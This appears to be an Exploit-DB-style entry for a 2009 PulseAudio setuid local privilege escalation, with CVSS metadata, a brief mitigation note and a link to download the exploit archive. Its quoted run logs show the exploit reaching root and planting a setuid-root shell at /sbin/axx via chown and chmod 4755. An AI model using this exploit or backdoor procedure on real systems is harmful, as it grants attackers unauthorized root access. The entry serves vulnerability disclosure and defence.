PulseAudio setuid Local Privilege Escalation Vulnerability

vendor:

PulseAudio

by:

Tavis Ormandy, Julien Tinnes and Yorick Koster

7,2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: PulseAudio

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 9.04 (x86-64) and Slackware 12.2.0 (x86)

2009

PulseAudio setuid Local Privilege Escalation Vulnerability

PulseAudio setuid Local Privilege Escalation Vulnerability is a vulnerability discovered by Tavis Ormandy, Julien Tinnes and Yorick Koster. It allows an attacker to gain root privileges by exploiting a setuid binary in PulseAudio. The exploit was tested with success on Ubuntu 9.04 (x86-64) and Slackware 12.2.0 (x86). The exploit is available for download at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz).

Mitigation:

The best way to mitigate this vulnerability is to ensure that the PulseAudio setuid binary is not installed on the system. If it is installed, it should be removed or disabled.

Source

Exploit-DB raw data:

PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and 
Yorick Koster 
--

Put files in /tmp/pulseaudio-exp (or change config.h). Must be on 
same fs as the pulseaudio binary.

Goes faster if you already have a pulseaudio running ? :p

Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 
(x86)

Ubuntu:
------------------------------------
$ ./c.sh
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root) 
groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm
in),122(sambashare)
# uname -a
Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 
UTC 2009 x86_64 GNU/Linux
------------------------------------
Slackware
------------------------------------
$ ./c.sh 
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
sh-3.1# id
uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt)
sh-3.1# uname -a
Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 
i686 Intel(R) Pentium(R) Dual  CPU  T3400  @ 2.16GHz 
GenuineIntel GNU/Linux
------------------------------------

download:  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)

# milw0rm.com [2009-07-20]